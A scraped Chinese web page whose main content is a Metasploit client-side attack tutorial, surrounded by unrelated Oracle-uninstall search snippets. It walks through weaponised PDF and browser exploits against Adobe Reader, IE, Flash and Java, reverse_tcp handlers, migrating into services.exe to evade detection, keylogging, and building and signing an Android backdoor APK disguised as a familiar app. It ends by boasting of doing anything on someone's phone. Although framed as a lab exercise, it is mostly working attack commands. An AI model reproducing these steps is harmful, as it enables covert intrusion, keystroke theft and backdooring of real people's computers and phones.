精华内容
下载资源
问答
  • Oracle卸载步骤.doc

    2017-06-09 23:33:59
    Oracle安装失败,如何卸载,供大家相互学习,如有错误,敬请留言。
  • 客户端渗透漏洞实战·漏洞利用·提权需要用到的环境VMwarekali Linuxwin XPwin 7前言现实的网络中,企业已经非常注重安全,攻击者也逐步从服务器攻击转向客户端攻击,比如:安卓渗透、软件后门、0day等等。...
    c37446834a84b9980ddc69be051213f2.png eda8f839ef435da076598d2d5698d346.png

    客户端渗透

    漏洞

    实战·漏洞利用·提权

    91883be215b573d1729193eb3fce565e.png 647d4cb459affd5e61df3f992cd5928d.png

    需要用到的环境

    VMware

    kali Linux

    win XP

    win 7

    647d4cb459affd5e61df3f992cd5928d.png

    前言

        现实的网络中,企业已经非常注重安全,攻击者也逐步从服务器攻击转向客户端攻击,比如:安卓渗透、软件后门、0day等等。那么,是怎么实现客户端攻击的呢?

        某些操作系统和软件应用,没有打上相应的补丁,存在较多的漏洞或是后门,可以通过漏洞或后门进行提权,达到完全控制的效果。

    647d4cb459affd5e61df3f992cd5928d.png

    工具

    Metasploit

    //黑天黑地黑王母的渗透神器

    Keytool、JARsigner、zipalign

    //APK文件签名三件套

    647d4cb459affd5e61df3f992cd5928d.png

    PDF漏洞

    WIN7中实验不成功,需在xp上,关闭防火墙和杀毒软件。

    实现使用reader 8.1.2 中的漏洞进行客户端的远程控制,该漏洞适用于xp系统,建议升级系统或是升级reader到最新版。

    Win xp 上安装adobe reader 8.1.2 版本,不能打补丁

    1480614368e4017f19f52745dc6f9fc3.png

    kali中启动msf

    root@kali:~# msfconsole  > search adobe

    a23174dbc7291982f9aa1546cfae4086.png

    > show options

    6007e1f45cf221c73e7b8f416e7377d8.png

    > set payload windows/meterpreter/reverse_tcp> set lhost 192.168.187.128> exploit 

    //把msf.pdf文件拷贝到靶机上。

    //把msf.pdf文件拷贝到远程的windows10上,会被杀毒软件查杀,恢复,压缩共享到windows xp上:

    c716930cb9b4747d3b0212da887f0f5f.png

    413b8d2f653148893c4cf0177faf49ed.png

    在kali上启动侦听

    7588004861fe43b5a551b9eb1bf679e5.png

    msf5 exploit(multi/handler) > exploit -j //启动msf5 exploit(multi/handler) > jobs //本地启动4444端口,等待目标连接过来

    当在windows xp上,双击msf.pdf文件,利用adobe漏洞,执行:

    a190b3400161125f5801d6e87b4ac2c7.png

    // msf.pdf是一个空的文件,xp连接到msf上

    deba1656283297d821ea196fdfb6e55e.png

    进程注入  

    //如果目标主机xp,发现异常,把adobe的进程关闭,可以将adobe的进程迁移到系统进程中,避免被目标主机关闭进程.

    meterpreter > ps

    5cacd027cdb6e6b0b1cc15b028987600.png

    meterpreter > migrate -P 1036 -N services.exe

    39f550ad3f74d7a763fe95ce1173aa7f.png

    注入成功!

    647d4cb459affd5e61df3f992cd5928d.png

    恶意网站

    搭建xp环境,关闭防火墙和杀毒软件,不打补丁。

    生成恶意的网站诱导用户点击,就能实现对客户端的完全控制。

    此漏洞是利用ie浏览器中的已知漏洞。

    建议更新系统或更新浏览器进行防范。

    未知的链接不能乱点。

    > use exploit/windows/browser/adobe_utilprintf> info

    ca71c13e29f5171d7a2cee267f130095.png

    //存在该缓冲区溢出漏洞

    > set SRVPORT 80> set payload windows/meterpreter/reverse_tcp> set lhost 192.168.187.128> set lport 4445> show options//随机生成url链接,目标查看这个网站容易产生警觉,可以设置:> set uripath /> exploit

    83a75fd5c2c3f58b8a5db825928bf272.png

    //生成的url链接:

    22cfa7476c12ccdfcbeb3be8fe84920a.png

    //在Xp上,使用ie浏览器打开此链接,在应用场景中,攻击者可使用社会工程学来诱导用户点击此链接。

    a523cffef1339589e02407d3057fcddc.png

    deba1656283297d821ea196fdfb6e55e.png

    提权:use priv run post/windows/capture/keylog_recorder //敲击键盘动作的记录====================================================================报错:[-] Exploit failed: Rex::RuntimeError The supplied resource '/' is already added. //80被占用jobsKill id=====================================================================思考???判断下方攻击载荷是什么利用漏洞:exploit/multi/browser/adobe_flash_hacking_team_uafexploit/multi/browser/adobe_flash_opaque_background_uafauxiliary/server/browser_autopwn2没错,就是flash的利用漏洞。
    647d4cb459affd5e61df3f992cd5928d.png

    flash漏洞

    搭建win7系统,关闭防火墙和杀毒软件,不打补丁。

    Windows7中保证安装flash:

    5524aca4e21ee04bfa440f2d02a1c44a.png

    msf5 > use exploit/multi/browser/adobe_flash_hacking_team_uafmsf5 exploit(multi/browser/adobe_flash_hacking_team_uaf) > set SRVPORT 80msf5 exploit(multi/browser/adobe_flash_hacking_team_uaf) > set uripath /msf5 exploit(multi/browser/adobe_flash_hacking_team_uaf) > set payloadwindows/meterpreter/reverse_tcpmsf5 exploit(multi/browser/adobe_flash_hacking_team_uaf) > set lhost 192.168.1.115msf5 exploit(multi/browser/adobe_flash_hacking_team_uaf) > set lport 777msf5 exploit(multi/browser/adobe_flash_hacking_team_uaf) > show targets //windows和linux平台上均存在,默认是选择windows,不需要修改

    7f943f27413f83694d34061267cff812.png

    Windows7端访问:http://192.168.1.115:80/

    4310d885d5ef26b79e7e67f595055474.png报错:

    msf5 exploit(multi/browser/adobe_flash_hacking_team_uaf) > info //查看模板信息

    1cbd24be86d1a1e9e3bbc8803cc6ee1a.png

    查看该win7靶机的信息:

    a888b10b6272a2986f73dec4950ec56b.png

    msf5 > use exploit/multi/browser/adobe_flash_opaque_background_uaf

    b4e138055c491023b433b0497bee7d42.png

    msf5 exploit(multi/browser/adobe_flash_opaque_background_uaf) > set srvport 80msf5 exploit(multi/browser/adobe_flash_opaque_background_uaf) > set uripath /

    7d7f9632d617d36da6409afed36403a7.png

    客户端访问:

    6fc51a9b76ab9e63f2d133fbdd60614d.png

    adf97cc8aa8e73da4ad1926e5239b6e3.png

    条件不匹配!!!

    -----------------------------------------------------------------

    msf5 > use auxiliary/server/browser_autopwn2msf5 auxiliary(server/browser_autopwn2) > set SRVPORT 80msf5 auxiliary(server/browser_autopwn2) > set uripath /#所有跟浏览器的漏洞利用代码全部打包起来,形成auxiliary,不需要指定payload

    948792d3ddf06b55b3d8d57569054b28.png

    #挑选质量比较好的漏洞,一个个的尝试:

    1859746c41b05d1060d562b1ed3355d5.png

    #支持安卓客户端

    依次用windows7、安卓、xp、windows10、centos8访问

    Windows7上访问地址:

    2aa90fffcffe7bf6693208caffecf1d3.png

    ba08bcf60bccf6fb08a9cce15ca219ea.png

    e78f6e59c183c8b7faca19894d1b9ecf.png

    d1e2eb55d1940f3ae1b974682e0d6766.png

    0c61fbf256b0c29e1e91419444f76f17.png

    //windows7上存在多个被利用的漏洞,利用成功

    09ecac6fb3e00fdd77145c27670b0aea.png

    IE浏览器的漏洞执行payload:

    0b1afb1e3e0fcdba096ba8b739544cf5.png/windows/browser的模块下,存在大量与浏览器相关的漏洞,可以逐个尝试。

    use exploit/windows/browser/ms14_064_ole_code_executionmsf5 > use exploit/windows/browser/ms14_064_ole_code_execution //支持windows7和xpmsf5 exploit(windows/browser/ms14_064_ole_code_execution) > set SRVPORT 80msf5 exploit(windows/browser/ms14_064_ole_code_execution) > set uripath /uripath => /msf5 exploit(windows/browser/ms14_064_ole_code_execution) > set payloadwindows/meterpreter/reverse_tcpmsf5 exploit(windows/browser/ms14_064_ole_code_execution) > set lhost 192.168.1.115msf5 exploit(windows/browser/ms14_064_ole_code_execution) > exploit

    客户端windows xp访问:

    07a6dceeb3477d0944ea971baefb06b2.png

    a0c74f90112ff4e0a0afed9fb52e9957.png

    647d4cb459affd5e61df3f992cd5928d.png

    JRE漏洞

    实验环境:

    Kali linux:192.168.1.115

    Windows xp:192.168.1.112 安装jre-7u10-i586版本

    msf5 > use exploit/multi/browser/java_jre17_driver_managermsf5 exploit(multi/browser/java_jre17_driver_manager) > set srvport 80msf5 exploit(multi/browser/java_jre17_driver_manager) > set uripath /msf5 exploit(multi/browser/java_jre17_driver_manager) > set payload java/ //需要选择基于java的meterpreter的payload,不能选择基于windowsset payload java/jsp_shell_bind_tcp set payload java/meterpreter/reverse_tcpset payload java/jsp_shell_reverse_tcp set payload java/shell/bind_tcpset payload java/meterpreter/bind_tcp set payload java/shell/reverse_tcpset payload java/meterpreter/reverse_http set payload java/shell_reverse_tcpset payload java/meterpreter/reverse_httpsmsf5 exploit(multi/browser/java_jre17_driver_manager) > set payload java/meterpreter/reverse_tcpmsf5 exploit(multi/browser/java_jre17_driver_manager) > set lhost 192.168.1.115msf5 exploit(multi/browser/java_jre17_driver_manager) > exploit -j[*] Exploit running as background job 0.[*] Exploit completed, but no session was created.msf5 exploit(multi/browser/java_jre17_driver_manager) >[*] Started reverse TCP handler on 192.168.1.115:4444[*] Using URL: http://0.0.0.0:80/[*] Local IP: http://192.168.1.115:80/ //生成可浏览的网站,一旦在XP上浏览该网站,只要有安装有漏洞的jre程序,会被执行

    靶机xp上,浏览器访问http://192.168.1.115

    fcf868316e03742ffa0c0b85232d9a98.png

    不要点击update,不然漏洞会被修补,选择later,才有实验效果

    dc8dd4ab-9216-eb11-8da9-e4434bdf6706.png

    b54891de8d399fcb488120f365c080f3.png

    会话建立成功!攻击成功!

    多次尝试以下载荷:use exploit/multi/browser/java_jre17_jmxbeanmsf5 > use exploit/multi/browser/java_jre17_jmxbeanmsf5 exploit(multi/browser/java_jre17_jmxbean) > set payload java/meterpreter/reverse_tcpmsf5 exploit(multi/browser/java_jre17_jmxbean) > set lhost 192.168.1.115msf5 exploit(multi/browser/java_jre17_jmxbean) > set uripath /msf5 exploit(multi/browser/java_jre17_jmxbean) > set srvhost 192.168.1.112msf5 exploit(multi/browser/java_jre17_jmxbean) > set lport 4446msf5 exploit(multi/browser/java_jre17_jmxbean) > set srvport 8080执行失败!use exploit/multi/browser/java_jre17_reflection_typesmsf5 > use exploit/multi/browser/java_jre17_reflection_typesmsf5 exploit(multi/browser/java_jre17_reflection_types) > set srvport 80msf5 exploit(multi/browser/java_jre17_reflection_types) > set uripath /msf5 exploit(multi/browser/java_jre17_reflection_types) > set payload java/meterpreter/reverse_tcpmsf5 exploit(multi/browser/java_jre17_reflection_types) > set lhost 192.168.1.115msf5 exploit(multi/browser/java_jre17_reflection_types) > exploit -j执行成功!

    最后一个!安卓渗透!

    生成Android后门程序:use payload/android/meterpreter/reverse_tcpgenerate -p android -o xxx.apk //生成a.apk文件,-p 平台生成payload,放入手机中执行:msf5 > use payload/android/meterpreter/reverse_tcpmsf5 payload(android/meterpreter/reverse_tcp) > set lhost 192.168.1.115msf5 payload(android/meterpreter/reverse_tcp) > generate -p android -o wandoujia.apkroot@kali:~# lswandoujia.apk放入windows中,杀毒软件不会检测apk文件,上传到安卓手机中安装: (需要连接数据线或蓝牙传输),在安卓手机上安装即可msf中监听:msf5 payload(android/meterpreter/reverse_tcp) > use exploit/multi/handlermsf5 exploit(multi/handler) > set payload android/meterpreter/reverse_tcpmsf5 exploit(multi/handler) > set lhost 192.168.1.115msf5 exploit(multi/handler) > set lport 777

    安卓手机上安装:会报错,解析包出问题

    下面使用第二种方法:

    msf5 > msfvenom --platform android -p android/meterpreter/reverse_tcp lhost=192.168.1.115 lport=9000-o meituan.apk //生成木马,蓝牙发送至手机,安装,生成一个appmsf5 > use exploit/multi/handlermsf5 exploit(multi/handler) > set payload android/meterpreter/reverse_tcpmsf5 exploit(multi/handler) > set lport 9000msf5 exploit(multi/handler) > exploit -j

    并点击生成的app执行,并可以wlan:

    5bf46b64a7cc85ceb324a853c2be3c0e.png

    即使能进入meterprer也会出现会话关闭现象!

    解决办法:制作签名

    生成的这个apk不能直接在Android中直接运行,

    因为这个apk需要一个签名才可以运行。

    下面我们为这个apk生成一个签名。

    创建签名需要使用Keytool、JARsigner、zipalign这3个软件。

    Kali中内置了前2个,第3个需要安装。

    第一步:

    使用keytool生成一个key文件。会让你输入该key的名称、单位、地址等等信息,最终生成一个key文件。

    root@kali:~# keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 1000

    ef1810bb41c2196a13d722bafdc541ac.png

    生成文件:my-release-key.Keystore

    第二步:

    使用该key文件配合JARsigner为APK签名

    root@kali:~# apt-get install openjdk-13-jdk-headless  //安装签名工具root@kali:~# jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore meituan.apk alias_name

    3b4c12fe26def64d2f0df9690a93d5ef.png

    第三步:

    使用JARsigner验证签名

    root@kali:~# jarsigner -verify -verbose -certs meituan.apk

    4d7590dbfc2f085ed7b9fa3706d8a653.png

    现在apk文件可以在任何安卓中使用,重新蓝牙发送到手机,并安装,显示如下图标:

    7047a5fe5bcf3145ae076f09703c0ad0.png

    执行报错:

    11d46341773b276bbd24a82add78039c.png

    解决:

    cea82b85acfbf0db694c253520a9ddd1.png

    点击安装的图标:

    ce324c70b29266cd067a138a44e08fc6.png

    于是,就可以在别人手机里为所欲为了。

    647d4cb459affd5e61df3f992cd5928d.png

    -END-

    1b1cc9339fb4e8ebbb22998cae96bd69.png 6cd54806a4bf9e11219b7a05a30d1af8.png

    "TAKE LIFE SERIOUSLY "

    24db5a98241d1fccd3d5c6effbf9234b.png f28dd4ab-9216-eb11-8da9-e4434bdf6706.svg

    每一个认真生活的人,都值得被认真对待。

    f38dd4ab-9216-eb11-8da9-e4434bdf6706.svg
    展开全文
  • oracle卸载干净的方法

    2011-07-12 17:19:10
    oracle 数据库卸载的时候需要卸载干净,否则再次安装的时候容易出错。这里提供一个删除干净的方法。
  • Linux Oracle卸载步骤

    千次阅读 2017-03-22 10:41:31
    第一种方法: 使用oracle自带的runInstaller 卸载; 第二种方法:通过删除文件的方式卸载;(即:删除Oracle安装目录下的所有文件和文件夹)  1. 使用SQL*PLUS停止数据库   2. 停止Listener   3. 用su或者...
    第一种方法: 使用oracle自带的runInstaller 卸载;
    第二种方法:通过删除文件的方式卸载;(即:删除Oracle安装目录下的所有文件和文件夹)
          1. 使用SQL*PLUS停止数据库 
          2. 停止Listener 
          3. 用su或者重新登录到root 
          4. 将oracle安装目录删除
          5. 将/usr/bin下的文件删除(删除这三个文件后,Oracle就不能使用了)
             rm /usr/local/bin/dbhome 
             rm /usr/local/bin/oraenv 
             rm /usr/local/bin/coraenv 
          6. 将/etc/oratab删除 
          7. 将/etc/oraInst.loc删除 
          8. 将oracle用户删除(若要重新安装,可以不删除) 
          9. 将用户组删除(若要重新安装,可以不删除)

    另一种方法:

    (1)关闭oracle服务和后台进程
    <1>查看安装的主目录和环境变量:
    echo $ORACLE_HOME
    env | grep ORA
    <2>查看实例名
    sqlplus / as sysdba
    select instance_name from v$instance;
    <3>查看启动的oracle后台进程
    ps –ef |grep ora_
    <4> shutdown immediate; 关闭服务
    ps –ef |grep ora_可以看到后台进程没有了
    lsnrctl status 查看监听程序状态
    (2)停止oracle的listener
    (3)删除$ORACLE_HOME目录下的子目录及文件
    cd $ORACLE_HOME
    pwd
    cd /u01/app/oradata/Helen
    secureCRT是windows下连接linux工具
    xmanager也是连接linux工具,支持图形化,这里我们通过dbca图形化方式卸载oracle要用xmanager
    dbca
    返回secureCRT
    (4)删除/usr/local/bin下的三个文件:dbhome,oraenv,coraenv
    su root
    cd /usr/local/bin
    ll
    rm dbhome
    rm oraenv
    rm coraenv
    (5)删除/etc下的两个文件:oratab和oralnst.loc
    cd /etc
    rm删除掉文件,同上
    (6)删除/opt目录的ORCLfmap子目录
    rm –rf ORCLfmap
    (7)删除建立的用户及组oinstall 和dba
    su –oracle

    Env | grp ORA
    su root 或者whoami查看当前用户是谁
    rm –rf /u01删除全部文件
    cat /etc/pass 查看用户
    cat /etc/group查看组
    多次exit退出重新用root登录
    userdel –r oracle
    groupdel oinstall
    groupdel dba
    展开全文
  • Oracle彻底卸载干净教程

    千次阅读 2020-04-21 17:26:25
    文章目录1.关闭所有服务2....6.删除C:\Program Files下oracle目录。7.删除开始菜单下oracle项 参考博客:https://blog.csdn.net/a772304419/article/details/79365744 1.关闭所有服务 ​ 打开cm...


    参考博客: https://blog.csdn.net/a772304419/article/details/79365744

    1.关闭所有服务

    ​ 打开cmd,运行services.msc,关闭oracle所有的服务。

    在这里插入图片描述

    2.打开注册表:打开cmd,运行regedit。

    1. 删除 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ 该路径下所有以oracle开始的服务名称,这个键是标识Oracle在windows下注册的各种服务。
      在这里插入图片描述

    2. 删除:

      HKEY_LOCAL_MACHINE\SOFTWARE\ORACLE

      删除该oracle目录,该目录下注册着Oracle数据库的软件安装信息。
      在这里插入图片描述

    3. 删除注册的oracle事件日志:

      路径:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\Application

      删除注册表的以oracle开头的所有项目。
      在这里插入图片描述

    3.删除环境变量

    鼠标右键右单击"我的电脑–>属性–>高级–>环境变量–>PATH 变量。

    删除Oracle在该值中的内容。注意:path中记录着一堆操作系统的目录,在windows中各个目录之间使用分号(;)隔开的,删除时注意。
    在这里插入图片描述

    4. 重启操作系统

    5.删除Oracle_Home下的所有数据。

    (Oracle_Home指Oracle程序的安装目录)

    6.删除C:\Program Files下oracle目录。

    (该目录视Oracle安装所在路径而定)

    7.删除开始菜单下oracle项

    如:C:\Documents and Settings\All Users\「开始」菜单\程序\Oracle - Ora10g

    不同的安装这个目录稍有不同。

    如果不删除开始菜单下的Oracle相关菜单目录,没关系,这个不影响再次安装Oracle.当再次安装Oracle时,该菜单会被替换。

    至此,Windows平台下Oracle就彻底卸载了。

    展开全文
  • 完全卸载oracle步骤

    2018-07-12 11:02:11
    很多人都遇到过卸载oracle后,重新安装会保错,原因是没有卸载干净导致的,所以分享该文档,oracle 10g和11g都亲自测试过有效。
  • 详解介绍了如何在如何在Linux平台上干净地删除Oracle 百度网盘下载,连接如果失效,可以联系作者。
  • 本文介绍了linux完全卸载oracle的详细步骤卸载前需使用SQL*PLUS停止数据库和相关服务,详细步骤看下面说明,大家可以参考使用
  • 我和大家一样,遇到了一个问题,就是如何把Oracle从自己的电脑卸载干净,很多人都觉得很难把Oracle卸载干净,于是选择重装系统,因为解决不了Oracle没有卸载干净之后,重装不了的问题,有时候真的会熟能生巧,我经过...

       我和大家一样,遇到了一个问题,就是如何把Oracle从自己的电脑卸载干净,很多人都觉得很难把Oracle卸载干净,于是选择重装系统,因为解决不了Oracle没有卸载干净之后,重装不了的问题,有时候真的会熟能生巧,我经过反反复复5,6次不放弃不抛弃地选择卸载安装Oracle。而不是选择重装系统之后,终于完完全全学会了如何把Oracle卸载干净,也许不是什么大不了的技能,但是是自己学到的一项新知识,所以要写篇总结奖励一下自己,顺便一提,我的操作系统是win10,Oracle是11。

      其实主要大体的步骤和网上分享的卸载Oracle的差不多,不同的是具体的细节描述,如果你第一次卸载Oracle,请仔细阅读,以下是我的经验分享。

    ======================================================================================================================

    第一步,停止所有oracle相关的服务。右键“我的电脑”--“管理”--“服务和应用程序”--“服务”,打开服务窗口,选择Oracle的服务,右键选择“停止”。

     

    第二步,在window下找到oracle文件夹,下面找到universal Installer,并点击,会出现类似安装时候出现的,检查画面,稍等一会,就可以打开软件。

    第三步:点击“卸载产品”,出现“产品清单”的窗口,可以看到“内容”下面有,“你已经安装了下列Oracle产品”,选择需要卸载的产品“OraDb11g_home1”,此处注意,需要的是点开这个目录,选择第二级的菜单“Oracle Database 11g 11.2.0.1.0”,然后点击“删除”按钮,等到卸载完成后,把“显示空主目录”勾上,就会显示已经卸载之后的空主目录“OraDb11g_home1”,此时,把这个目录勾上,点击删除,卸载完成后,在列表上看不到oracle11g的相关目录,就算是卸载完成了。

    第四步:重启电脑,这一步因为某些卸载操作要在重启后才生效。

    第五步:删除Oracle的注册列表。快捷键“win+r”打开“运行”窗口,输入“regedit”,确定,打开“注册表编辑器”。

    -----HKEY_LOCAL_MACHINE\SOFTWARE,删除该目录下的ORACLE
    -----HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services,删除该目录下的所有Oracle入口。
    -----HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\Application, 删除该目录下的所有Oracle入口。

     

     第六步:删除Oracle所在的安装目录,另外,如果环境变量中你有配置任何Oracle相关的环境变量也需要删除该环境变量,最后卸载完成。

    ============================================================================================================

    注意:

    1、使用universal installer卸载软件记得删除空的主目录。

    2、卸载完成后记得删除相关Oracle的环境变量。

    转载于:https://www.cnblogs.com/liujiale/p/8727032.html

    展开全文
  • Oracle卸载步骤

    2018-02-18 16:05:11
    1,先使用UniversalInstaller删除安装的Oracle产品在安装的oracle产品中一个一个选中删除删除完成后会显示:没有安装的产品2、 右击“计算机”--&gt;管理--&gt;服务和应用程序--&gt;服务,停掉所有...
  • (1)、一般情况运行Oracle自带的卸载程序,如使用Universal Installer 工具卸载。  点击开始菜单找到Oracle,然后点击Oracle安装产品,再点击Universal Installer。 (2)、点击之后稍等一会然后会进入进入下图...
  • Oracle11G完全卸载步骤

    万次阅读 多人点赞 2018-06-17 10:18:47
    完全卸载oracle11g步骤: 1、 开始->设置->控制面板->管理工具->服务,停止所有Oracle服务。 2、 开始->程序->Oracle_OraDB11g_Home1->OracleInstallation Products->Universal Installer,单击...
  • Oracle12c卸载步骤

    万次阅读 2018-04-08 16:23:15
    万一安装Oracle12c失败,卸载步骤如下两步走:一、删除Oracle的注册列表1.关闭Oracle所有服务,可以在window的服务管理器中关闭2.用C:\Windows下的regedit.exe打开注册表删除该路径 HKEY_LOCAL_MACHINE\SYSTEM\...
  • 卸载步骤如下:1.运行$ORACLE_HOME/bin/localconfig delete2.rm -rf $ORACLE_BASE/*3.rm -f /etc/oraInst.loc etc/oratab rm -rf /etc/oracle rm -f /etc/inittab.cssd rm -f /usr/local/bin/coraenv /usr/local/bi.....
  • 干净卸载Oracle

    2012-07-25 16:21:22
    由于Oracle安装之后,很难卸载干净导致以后安装时都会出问题,按此文档可以干净卸载Oracle
  • 完全卸载Oracle方法(超详细)

    万次阅读 多人点赞 2019-04-25 19:14:32
    找到Oracle开头的服务 将这些服务全部停止 Step1. 点击开始菜单找到Oracle,然后点击Oracle安装产品,再点击Universal Installer Step2. 点击之后稍等一会然后会进入进入下图界面,点击卸载产品 Step3....
  • oracle卸载干净步骤

    千次阅读 2019-06-19 11:25:35
    完全卸载oracle11g步骤: 1、 开始->设置->控制面板->管理工具->服务,停止所有Oracle服务。 2、 开始->程序->Oracle_OraDB11g_Home1->OracleInstallation Products->Universal Installer,单击...
  • 1. 停用当前oracle所有服务 ...2. 在开始菜单中,找到Universal Installer(Oracle自带的卸载程序),运行Oracle Universal Installer,单击卸载产品 在产品清单窗口中,单击全部展开,除了OraDb11g_home1外,勾...
  • Oracle在win10的卸载过程

    千次阅读 2019-03-21 14:09:14
    以下是Oracle的全部卸载过程 关闭Oracle所有的服务:可以点击win+R,输入services.msc,点击确定 找到所有以Oracle开头的服务,全部点击停止。 打开注册表,regedis打开路径,点击确定 找到HKEY_LOCAL_MACHINE\...
  • Oracle完全卸载详解

    2020-02-23 00:31:57
    Oracle完全卸载详解 </h2> <div class="postbody"> Oracle数据库的安装这里就不说了,网上应该有很多,但是oracle数据库的卸载却找不到一个比较详细的完整卸载的说明。很多卸载不完全,会有遗留...
  • 如何将Oracle11g卸载干净

    千次阅读 2019-07-10 21:14:52
    卸载Oracle11g步骤如下: 1、在开始菜单中找到Oracle目录下的universal installer,点击:点击后如图,第二步时,除了第一个目录,其它均勾选,然后点击删除即可。 2、oracle注册表的删除 wind+R 输入regedit 后...
  • 卸载oracle客户端的方法

    热门讨论 2011-11-17 18:27:55
    介绍干净卸载oracle客户端的方法 介绍干净卸载oracle客户端的方法 介绍干净卸载oracle客户端的方法
  • 【绝对管用】彻底的卸载干净oracle 11g

    万次阅读 多人点赞 2018-02-24 22:06:23
    1.进入服务:运行services.msc,关闭oracle所有的服务。可以在windows的服务管理器中关闭;2.打开注册表:regedit 打开路径: &lt;找注册表 :开始-&gt;运行-&gt;regedit&gt; HKEY_LOCAL_MACHINE\...
  • window10系统完全卸载oracle 11g教程

    千次阅读 2019-12-31 11:05:57
    前言 在安装Oracle 11g数据库中途总会有各种意向不到的问题,即使在重装几次问题...若想完全卸载Oracle需要有下面几个步骤: 终止所有的Oracle运行的服务。 使用Universal Installer卸载相关的组件。 手动删除Or...
  • Step0: 进入服务 找到Oracle开头的服务 ...选中要删除的Oracle产品( 删除图片中Oracle11g_home1 “+号”下面整个文件;不要删除这个最外面的这个;图片截取时截错了),然后点击删除 Step...
  • oracle 卸载干净方法

    2009-09-04 09:56:02
    经常安装完oracle 运行段时间出问题,卸载重装出问题,怎么卸载干净重装方法。
  • 软件下载地址:  ... 服务端因文件过大,所以分了两个文件压缩包,下载后将内容解压后放置同一个文件夹中 ...Oracle 手动添加环境变量: LD_LIBRARY_PATH C:\appx64\Administrator\product\11.2.0...
  • 完全卸载Oracle方法(亲测有效)

    千次阅读 2018-09-15 14:00:15
    (1)ctrl+alt+del进入任务管理器,输入“oracle”,根据描述一栏关闭相关的Oracle进程 2.关闭服务 (1) win+r键运行"services.msc"回车,进入服务 (2)输入"oracle"找到与Oracle 相关的所有...
  • oracle彻底卸载步骤

    2018-06-12 00:56:37
    oracle卸载麻烦,希望与大家共享。恢复建设的考核方式的合法会计师电话费速度快结婚方式的返还借款收到回复时看到回复收到回复时都会放假
  • oracle19c卸载教程

    千次阅读 2021-09-07 12:00:17
    2.使用Universal installer进行卸载 左键【开始】找到oracle,注意以管理员身份运行 3.清理注册表 win+r打开运行窗口,输入regedit 1)删除HKEY_LOCAL_MACHINE\SOFTWARE\ORACLE 2)删除HKEY_LOCAL_MACHINE\...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 1,527
精华内容 610
关键字:

oracle卸载步骤干净